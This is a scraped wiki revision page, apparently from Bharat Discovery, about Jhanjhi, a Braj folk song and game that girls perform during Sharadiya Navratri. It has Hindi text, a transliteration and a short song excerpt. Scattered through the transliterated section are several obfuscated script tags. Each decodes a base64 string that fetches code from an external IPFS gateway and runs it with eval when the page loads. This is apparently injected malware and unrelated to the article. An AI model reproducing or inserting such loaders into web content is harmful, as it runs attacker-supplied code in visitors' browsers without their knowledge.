Difference between revisions of "झाँझी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(3 intermediate revisions by the same user not shown)
Line 1: Line 1:
 +
[[चित्र:Jhanjhi.jpg|thumb|[[टेसू]] और झाँझी]]
 
'''झैंझी या झाँझी, [[नवरात्र|शारदीय नवरात्र]] के दिनों में गाया जाने वालो बालिकाओं का गीत''' है जो [[ब्रज]] में विशेष रूप से प्रचलित है। बालिकाएँ झाँझी, [[मिट्टी]] की छेददार हाँडी- जिसमें [[दीपक|दिया]] जलता रहता है, लेकर एक घर से दूसरे घर फेरा करती हैं, झाँझी के गीत गाती हैं और पैसे माँगती हैं। ये गीत कथा की दृष्टि से अद्भुत, किन्तु मनोरंजक होते हैं।
 
'''झैंझी या झाँझी, [[नवरात्र|शारदीय नवरात्र]] के दिनों में गाया जाने वालो बालिकाओं का गीत''' है जो [[ब्रज]] में विशेष रूप से प्रचलित है। बालिकाएँ झाँझी, [[मिट्टी]] की छेददार हाँडी- जिसमें [[दीपक|दिया]] जलता रहता है, लेकर एक घर से दूसरे घर फेरा करती हैं, झाँझी के गीत गाती हैं और पैसे माँगती हैं। ये गीत कथा की दृष्टि से अद्भुत, किन्तु मनोरंजक होते हैं।
[[चित्र:Jhanjhi.jpg|thumb|टेसू और [[झाँझी]]]]
+
[[ब्रज]] के लोक जीवन में प्रचलित मनोरंजन प्रधान गीतों के अन्तर्गत ' झाँझी' या 'झैझी' के गीत आते हैं। [[आश्विन|क्वार]] के [[महीने]] में शारदीय नवरात्र के अवसर पर लड़के [[टेसू]] के गीत गाते हैं और लड़कियाँ झाँझी के गीत गाती हैं। ये दोनों गीत टेसू और झाँझी के खेल से सम्बद्ध हैं इन्हें बच्चे ही गाते हैं। झाँझी के गीत प्राय: संवादात्मक होते हैं और इनमें छोटी-छोटी कहानियाँ भी अनुस्यूत होती हैं। विषय की दृष्टि से ये गीत बड़े अद्भुत और सरस होते हैं। एक झाँझी गीत की आरम्भिक पंक्तियाँ इस प्रकार है-
[[ब्रज]] के लोक जीवन में प्रचलित मनोरंजन प्रधान गीतों के अन्तर्गत ' झाँझी' या 'झैझी' के गीत आते हैं। [[आश्विन|क्वार]] के [[महीने]] में शारदीय नवरात्र के अवसर पर लड़के [[टेसू]] के गीत गाते हैं और लड़कियाँ झाँझी के गीत गाती हैं। ये दोनों गीत टेसू और झाँझी के खेल से सम्बद्ध हैं इन्हें बच्चे ही गाते हैं। झाँझी के गीत प्राय: संवादात्मक होते हैं और इनमें छोटी-छोटी कहानियाँ भी अनुस्यूत होती हैं। विषय की दृष्टि से ये गीत बड़े अद्भुत और सरस होते हैं। एक झाँझी गीत की आरम्भिक पंक्तियाँ इस प्रकार है
+
[[चित्र:Jhanjhi-1.jpg|thumb|दुकान पर बिकते [[टेसू]] और झाँझी|left]]
 
<poem>
 
<poem>
 
'बाबा जी के चेली-चेला भिच्छ्या माँगन आए जी।  
 
'बाबा जी के चेली-चेला भिच्छ्या माँगन आए जी।  
Line 8: Line 9:
 
[[टेसू]] और झाँझी के खेल के अन्त में टेसू का [[विवाह]] झाँझी से कर देते हैं और टेसू का सिर उखाड़कर फेंक दिया जाता है।
 
[[टेसू]] और झाँझी के खेल के अन्त में टेसू का [[विवाह]] झाँझी से कर देते हैं और टेसू का सिर उखाड़कर फेंक दिया जाता है।
  
 +
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
  
{{लेख प्रगति|आधार=आधार1|प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
Line 17: Line 18:
  
 
==संबंधित लेख==
 
==संबंधित लेख==
{{भूले बिसरे शब्द}}
+
{{भूले बिसरे शब्द}}{{पारंपरिक खेल}}
{{पर्व और त्योहार}}
 
 
 
 
[[Category:पर्व और त्योहार]]
 
[[Category:पर्व और त्योहार]]
 
[[Category:संस्कृति कोश]]  
 
[[Category:संस्कृति कोश]]  
 
 
[[Category:भूला-बिसरा_भारत]]
 
[[Category:भूला-बिसरा_भारत]]
 
[[Category:व्रत और उत्सव]]
 
[[Category:व्रत और उत्सव]]
 +
[[Category:पारंपरिक खेल]]
 
__INDEX__
 
__INDEX__

Latest revision as of 14:13, 13 December 2011

[[chitr:Jhanjhi.jpg|thumb|tesoo aur jhaanjhi]] jhaianjhi ya jhaanjhi, sharadiy navaratr ke dinoan mean gaya jane valo balikaoan ka git hai jo braj mean vishesh roop se prachalit hai. balikaean jhaanjhi, mitti ki chhedadar haandi- jisamean diya jalata rahata hai, lekar ek ghar se doosare ghar phera karati haian, jhaanjhi ke git gati haian aur paise maangati haian. ye git katha ki drishti se adbhut, kintu manoranjak hote haian. braj ke lok jivan mean prachalit manoranjan pradhan gitoan ke antargat ' jhaanjhi' ya 'jhaijhi' ke git ate haian. kvar ke mahine mean sharadiy navaratr ke avasar par l dake tesoo ke git gate haian aur l dakiyaan jhaanjhi ke git gati haian. ye donoan git tesoo aur jhaanjhi ke khel se sambaddh haian inhean bachche hi gate haian. jhaanjhi ke git pray: sanvadatmak hote haian aur inamean chhoti-chhoti kahaniyaan bhi anusyoot hoti haian. vishay ki drishti se ye git b de adbhut aur saras hote haian. ek jhaanjhi git ki arambhik panktiyaan is prakar hai- [[chitr:Jhanjhi-1.jpg|thumb|dukan par bikate tesoo aur jhaanjhi|left]]

'baba ji ke cheli-chela bhichchhya maangan ae ji.
bhari chutaki maianne bhichchha dari, chooandariya rangi lae ji..'

tesoo aur jhaanjhi ke khel ke ant mean tesoo ka vivah jhaanjhi se kar dete haian aur tesoo ka sir ukha dakar pheank diya jata hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh


bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>